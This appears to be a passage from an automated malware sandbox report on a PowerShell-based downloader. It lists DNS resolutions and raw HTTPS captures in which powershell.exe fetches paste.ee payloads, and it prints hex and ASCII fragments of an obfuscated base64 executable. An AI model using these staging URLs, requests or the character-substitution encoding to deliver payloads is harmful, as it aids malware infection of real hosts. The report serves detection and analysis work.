                                Oct 3, 2024 09:28:18.948904037 CEST1.1.1.1192.168.2.60x4bd9No error (0)gratitudeseekers.com173.231.247.100A (IP address)IN (0x0001)false
                                Oct 3, 2024 09:28:23.395855904 CEST1.1.1.1192.168.2.60xac6bNo error (0)pastebin.com104.20.4.235A (IP address)IN (0x0001)false
                                Oct 3, 2024 09:28:23.395855904 CEST1.1.1.1192.168.2.60xac6bNo error (0)pastebin.com172.67.19.24A (IP address)IN (0x0001)false
                                Oct 3, 2024 09:28:23.395855904 CEST1.1.1.1192.168.2.60xac6bNo error (0)pastebin.com104.20.3.235A (IP address)IN (0x0001)false

                                HTTP Request Dependency Graph

                                • paste.ee
                                • www.gratitudeseekers.com
                                • pastebin.com

                                HTTPS Proxied Packets

                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                0192.168.2.649713188.114.97.34436764C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                TimestampBytes transferredDirectionData
                                2024-10-03 07:28:12 UTC67OUTGET /d/RdlsG/0 HTTP/1.1
                                Host: paste.ee
                                Connection: Keep-Alive
                                2024-10-03 07:28:12 UTC1206INHTTP/1.1 200 OK
                                Date: Thu, 03 Oct 2024 07:28:12 GMT
                                Content-Type: text/plain; charset=utf-8
                                Transfer-Encoding: chunked
                                Connection: close
                                Cache-Control: max-age=2592000
                                strict-transport-security: max-age=63072000
                                x-frame-options: DENY
                                x-content-type-options: nosniff
                                x-xss-protection: 1; mode=block
                                content-security-policy: default-src 'self'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://cdnjs.cloudflare.com https://www.google.com https://www.gstatic.com https://analytics.paste.ee; img-src 'self' https://secure.gravatar.com https://analytics.paste.ee data:; style-src 'self' 'unsafe-inline' https://fonts.googleapis.com https://cdnjs.cloudflare.com; font-src 'self' https://themes.googleusercontent.com https://fonts.gstatic.com; frame-src https://www.google.com; object-src 'none'
                                cf-cache-status: DYNAMIC
                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ky2YPiCzniAijJxYoOV0bmLKNjF%2FB6jCLkGyt6%2FXogq1tbtcys83x1z4x3kcZwf%2BWSLswsVKE4nO%2FXxXXMnYiRyTgYksY7Ln1tTp7yEhjx2RfyrMoxzk0GoeBQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                Server: cloudflare
                                CF-RAY: 8ccb36cc2ef10f63-EWR
                                2024-10-03 07:28:12 UTC163INData Raw: 66 37 66 0d 0a 54 56 71 51 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 4d e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 45 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 2f 2f 38 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 4c 67 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93
                                Data Ascii: f7fTVqQ::M::::E:::://8::Lg:::::::::
                                2024-10-03 07:28:12 UTC1369INData Raw: 51 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86
                                Data Ascii: Q::::::::::::::::::::::::::::::::::::
                                2024-10-03 07:28:12 UTC1369INData Raw: 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 43 42 48 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 42 50 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 47 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 47 67 44 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86
                                Data Ascii: ::::::::::::CBH::BP:::::G:::GgD:::::::::::::
                                2024-10-03 07:28:12 UTC1073INData Raw: 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 47 e2 86 93 3a e2 86 93 75 63 6e 4e 79 59 77 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 47 67 44 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 59 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 51 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 71 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86
                                Data Ascii: ::G:ucnNyYw:::GgD::::Y:::::Q::::q:::::::::::::::
                                2024-10-03 07:28:12 UTC1369INData Raw: 32 30 30 30 0d 0a 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93
                                Data Ascii: 2000::::::::::::::::::::::::::::::::::::
                                2024-10-03 07:28:12 UTC1369INData Raw: 45 51 55 58 62 77 63 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 6f 6f 43 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 43 67 77 64 4b 34 34 52 42 42 66 57 45 77 51 52 42 e2 86 93 3a e2 86 93 6b 78 78 77 67 71 e2 86 93 3a e2 86 93 42 73 77 42 67 44 4d e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 67 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 45 51 49 6f 43 51 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 43 6a 6d 6f e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 47 34 30 43 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 42 4a 52 5a 79 33 77 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 63 42 30 6f 43 77 e2 86 93 3a e2
                                Data Ascii: EQUXbwc:::ooC:::CgwdK44RBBfWEwQRB:kxxwgq:BswBgDM:::::g::EQIoCQ::Cjmo::::G40C:::BJRZy3w::cB0oCw:
                                2024-10-03 07:28:12 UTC1369INData Raw: 86 93 e2 86 93 3a e2 86 93 61 69 4a 52 73 47 62 78 49 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 71 69 4a 52 78 79 6d 77 4d e2 86 93 3a e2 86 93 63 42 77 6f 43 77 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 42 71 49 6f 43 67 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 43 68 59 57 46 53 67 4e e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 4b 4a 6e 4b 66 e2 86 93 3a e2 86 93 77 42 77 47 43 67 4c e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 47 66 67 55 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 52 79 77 51 4d e2 86 93 3a e2 86 93 63 42 59 6f 43 77 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 42 69 67 4d e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 4b 46 68 59 56 4b e2 86 93
                                Data Ascii: :aiJRsGbxI:::qiJRxymwM:cBwoCw::BqIoCg::ChYWFSgN:::KJnKf:wBwGCgL:::GfgU:::RywQM:cBYoCw::BigM:::KFhYVK
                                2024-10-03 07:28:12 UTC1369INData Raw: 43 4a 70 76 46 77 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 43 68 4d 4a 47 53 75 38 46 78 4d 4b 47 69 75 32 45 51 6f 52 43 58 49 76 42 e2 86 93 3a e2 86 93 42 77 47 69 67 4c e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 47 62 78 55 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 6f 75 4c 42 45 4b 45 51 6c 79 51 51 51 e2 86 93 3a e2 86 93 63 42 59 6f 43 77 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 42 6d 38 56 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 4b 4c 68 59 52 43 68 45 4a 63 6c 63 45 e2 86 93 3a e2 86 93 48 e2 86 93 3a e2 86 93 61 4b e2 86 93 3a e2 86 93 73 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 5a 76 46 51 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 43 6a 4d 46 33 59 38 47 e2
                                Data Ascii: CJpvFw::ChMJGSu8FxMKGiu2EQoRCXIvB:BwGigL:::GbxU:::ouLBEKEQlyQQQ:cBYoCw::Bm8V:::KLhYRChEJclcE:H:aK:s:::ZvFQ::CjMF3Y8G
                                2024-10-03 07:28:12 UTC1369INData Raw: 93 3a e2 86 93 6f 47 47 79 67 45 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 47 63 69 59 47 e2 86 93 3a e2 86 93 48 e2 86 93 3a e2 86 93 5a 4b e2 86 93 3a e2 86 93 73 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 59 6f 44 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 43 67 77 65 4f 49 7a 39 2f 2f 38 6f 48 51 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 43 6d 38 65 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 4b 4a 68 38 4a 4f 48 72 39 2f 2f 38 6f 48 77 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 43 6d 38 65 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 4b 4a 67 63 58 6d 6e 49 77 42 67 42 77 47 43 67 4c e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 47 62 79
                                Data Ascii: :oGGygE:::GciYG:H:ZK:s:::YoD:::CgweOIz9//8oHQ::Cm8e:::KJh8JOHr9//8oHw::Cm8e:::KJgcXmnIwBgBwGCgL:::Gby
                                2024-10-03 07:28:12 UTC1355INData Raw: e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 4b 62 79 67 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 6f 4e 46 69 73 42 46 6b 55 43 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 67 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 43 49 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 72 4a 51 6c 79 64 67 59 e2 86 93 3a e2 86 93 63 42 67 6f 43 77 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 42 6e 4a 36 42 67 42 77 47 43 67 4c e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 47 62 79 6f e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 6f 4e 46 79 76 52 46 43 59 59 4b 38 7a 64 6d e2 86 93 3a
                                Data Ascii: :::Kbyg:::oNFisBFkUC:::::g:::CI::::rJQlydgY:cBgoCw::BnJ6BgBwGCgL:::Gbyo:::oNFyvRFCYYK8zdm:


                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                1192.168.2.649717188.114.97.34436764C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                TimestampBytes transferredDirectionData
                                2024-10-03 07:28:18 UTC43OUTGET /d/b5xuX/0 HTTP/1.1
                                Host: paste.ee
                                2024-10-03 07:28:18 UTC1204INHTTP/1.1 200 OK
                                Date: Thu, 03 Oct 2024 07:28:18 GMT
                                Content-Type: text/plain; charset=utf-8
                                Transfer-Encoding: chunked
                                Connection: close
                                Cache-Control: max-age=2592000
                                strict-transport-security: max-age=63072000
                                x-frame-options: DENY
                                x-content-type-options: nosniff
                                x-xss-protection: 1; mode=block
                                content-security-policy: default-src 'self'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://cdnjs.cloudflare.com https://www.google.com https://www.gstatic.com https://analytics.paste.ee; img-src 'self' https://secure.gravatar.com https://analytics.paste.ee data:; style-src 'self' 'unsafe-inline' https://fonts.googleapis.com https://cdnjs.cloudflare.com; font-src 'self' https://themes.googleusercontent.com https://fonts.gstatic.com; frame-src https://www.google.com; object-src 'none'
                                CF-Cache-Status: DYNAMIC
                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Ql8eKOp38A0KESyl7rHecI9lM0UGOmeAXIH33uit8JLDaNBigHF8ITrJTbgg7cFuqTmF8YHP0GLmz%2BHxK6DtlioJuxTckgUXq7dY85SGqpWGFG%2B1B1c%2B27uCJw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                Server: cloudflare
                                CF-RAY: 8ccb36f16b8941ff-EWR
                                2024-10-03 07:28:18 UTC165INData Raw: 66 37 66 0d 0a 54 56 71 51 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 4d e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 45 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 2f 2f 38 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 4c 67 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 51 e2
                                Data Ascii: f7fTVqQ::M::::E:::://8::Lg:::::::::Q
                                2024-10-03 07:28:18 UTC1369INData Raw: 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a
                                Data Ascii: :::::::::::::::::::::::::::::::::::::
                                2024-10-03 07:28:18 UTC1369INData Raw: e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 52 54 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 42 50 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 47 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 45 67 44 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86
                                Data Ascii: :::::::::::::RT::BP:::::G:::EgD::::::::::::
                                2024-10-03 07:28:18 UTC1071INData Raw: 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 47 e2 86 93 3a e2 86 93 75 63 6e 4e 79 59 77 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 45 67 44 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 59 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 51 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 32 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2
                                Data Ascii: :::G:ucnNyYw:::EgD::::Y:::::Q::::2:::::::::::::::
                                2024-10-03 07:28:18 UTC1369INData Raw: 34 30 30 30 0d 0a 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93
                                Data Ascii: 4000:::::::::::::::::::::::::::::::::::
                                2024-10-03 07:28:18 UTC1369INData Raw: e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 42 79 4d 51 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 63 42 73 6f 53 51 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 42 6e 4a 44 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 42 77 47 53 68 4a e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 47 4b e2 86 93 3a e2 86 93 45 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 43 75 e2 86 93 3a e2 86 93 43 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 42 48 4a 64 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 42 77 48 69 68 4a e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 47 63 6d 38 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 48 e2 86 93 3a e2 86 93 5a 4b 45 6b e2 86 93 3a
                                Data Ascii: :::::ByMQ::cBsoSQ::BnJD::BwGShJ:::GK:E::Cu:C:::BHJd::BwHihJ:::Gcm8::H:ZKEk:
                                2024-10-03 07:28:18 UTC1369INData Raw: e2 86 93 45 51 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 42 43 6f 65 e2 86 93 3a e2 86 93 69 67 53 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 4b 4b 6f 34 50 e2 86 93 3a e2 86 93 43 67 53 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 47 44 77 45 6f 45 77 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 42 74 e2 86 93 3a e2 86 93 46 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 62 4b e2 86 93 3a e2 86 93 38 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 6f 6f 48 77 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 43 69 67 4c e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 72 4b 67 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 42 73 77 44 e2 86 93 3a e2 86 93 44 39 42 51
                                Data Ascii: EQ::BCoe:igS:::KKo4P:CgS:::GDwEoEw::Bt:F:::bK:8:::ooHw::CigL:::rKg:::BswD:D9BQ
                                2024-10-03 07:28:18 UTC1369INData Raw: 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 48 4d 77 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 4b 45 77 55 58 4b 39 51 52 42 53 67 78 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 4b 62 7a 49 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 6f 59 4b 38 55 52 42 58 4c 42 e2 86 93 3a e2 86 93 67 42 77 48 43 68 4a e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 47 63 7a 4d e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 70 76 4e e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 43 6e 49 46 e2 86 93 3a e2 86 93 77 42 77 48 53 68 4a e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 47 46 52 59 6f 4e 51 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86
                                Data Ascii: :::HMw:::KEwUXK9QRBSgx:::KbzI:::oYK8URBXLB:gBwHChJ:::GczM:::pvN:::CnIF:wBwHShJ:::GFRYoNQ::
                                2024-10-03 07:28:18 UTC1369INData Raw: 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 4a e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 44 4d e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 42 2b e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 68 77 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 4e 30 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 44 77 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 2b 51 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 42 34 42 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 42 5a e2 86 93 3a e2 86 93 51 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 62 67 45 e2 86 93 3a e2 86 93 e2 86 93 3a
                                Data Ascii: :::J::::DM:::B+::::hw:::N0:::Dw::::+Q:::B4B::BZ:Q::bgE::
                                2024-10-03 07:28:18 UTC1369INData Raw: 86 93 70 36 66 67 34 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 51 52 44 58 73 54 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 45 45 52 59 44 45 52 51 53 43 32 38 36 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 47 4c 51 5a 7a 50 67 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 43 6e 6f 52 44 69 44 34 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 31 68 4d 58 48 77 6f 34 54 76 37 2f 2f 77 4d 52 44 68 7a 57 4b 45 45 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 6f 58 32 68 4d 61 48 77 73 34 4f 66 37 2f 2f 78 59 54 47 78 38 4d 4f 43 2f 2b 2f 2f 38 34 70 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86
